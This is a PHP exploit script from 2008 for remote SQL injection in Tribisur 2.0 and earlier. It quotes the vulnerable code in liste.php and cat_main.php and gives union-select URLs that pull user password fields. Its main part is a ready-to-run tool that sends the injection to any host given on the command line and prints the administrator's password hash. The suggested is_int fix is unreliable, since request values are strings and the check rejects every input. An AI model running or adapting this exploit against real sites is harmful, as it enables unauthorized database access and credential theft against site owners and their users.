tribisur-sql.txt
Posted on 06 January 2008
#!/usr/bin/php -q <?php echo "[*]Tribisur <= 2.0 Remote SQL Injection Exploit "; echo "[*]Coded by x0kster -x0kster[AT]gmail[DOT]com - "; /* Script Download : http://www.comscripts.com/scripts/php.tribisur-20.1211.html Bug #1 in modules/forum/liste.php : First, this bugged page is included through forum.php : <?php //forum.php [...] 34. if($action == "liste") { 35. include ("./modules/forum/liste.php"); 36. } [...] ?> And now the bugged code :-) : <?php //liste.php [...] 5. $select = 'SELECT * FROM categorie_du_forum WHERE id='.$cat.' '; 6. $result = mysql_query($select,$link) or die ('Erreur : '.mysql_error() ); 7. $total = mysql_num_rows($result); [...] ?> So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug #2 in cat_main.php : <?php //cat_main.php [...] 32. $select3 = 'SELECT * FROM menu WHERE valider="oui" AND id='.$id.' '; 33. $result3 = mysql_query($select3,$link) or die ('Erreur : '.mysql_error() ); 34. $total3 = mysql_num_rows($result3); [...] ?> So like the first we can exploit it with: cat_main.php?id=-1+union+select+0,concat(pseudo,0x3a,passe),0,0,0,0,0,0+from+utiliz+where+id=1 Fix : <?php //liste.php [...] 5. if(!is_int($cat)){ die("Hacking Attempt"); } 6. $select = 'SELECT * FROM categorie_du_forum WHERE id='.$cat.' '; 7. $result = mysql_query($select,$link) or die ('Erreur : '.mysql_error() ); 8. $total = mysql_num_rows($result); [...] ?> <?php //cat_main.php [...] 32. if(!is_int($id)){ die("Hacking Attempt"); } 33. $select3 = 'SELECT * FROM menu WHERE valider="oui" AND id='.$id.' '; 34. $result3 = mysql_query($select3,$link) or die ('Erreur : '.mysql_error() ); 35. $total3 = mysql_num_rows($result3); [...] ?> Exploit : */ if ($argc<4) { echo "[*]Usage: php ".$argv[0]." host path mode "; echo "[*]Mode: 1 -SQL Injection in cat_main.php- "; echo " 2 -SQL Injection in modules/forum/liste.php- "; echo "[*]Example: "; echo "[*]php ".$argv[0]." localhost /tribusur/ 1 "; die; } function get_response($packet){ global $host, $response; $socket=fsockopen(gethostbyname($host),80); if (!$socket) { echo "[-]Error contacting $host. "; exit();} fputs($socket,$packet); $response=''; while (!feof($socket)) { $response.=fgets($socket); } fclose($socket); } $host =$argv[1]; $path =$argv[2]; $mode =$argv[3]; if($mode == "1"){ $packet ="GET ".$path."cat_main.php?id=-1+union+select+0,concat(0x78306b73746572,passe,0x78306b73746572),0,0,0,0,0,0+from+utiliz+where+id=1/*"; $packet.="Host: ".$host." "; $packet.="Connection: Close "; }elseif($mode == "2"){ $packet ="GET ".$path."forum.php?action=liste&cat=-1+union+select+0,concat(0x78306b73746572,passe,0x78306b73746572),0,0,0,0,0,0,0,0+from+utiliz+where+id=1/*"; $packet.="Host: ".$host." "; $packet.="Connection: Close "; }else{ echo "[-]Incorrect Mode. "; die; } get_response($packet); if(strstr($response,"x0kster")){ $hash = explode("x0kster",$response,32); echo "[+]Ok, the admin hash is : $hash[1] "; die; }else{ echo "[-]Exploit filed, maybe fixed? "; die; } ?>
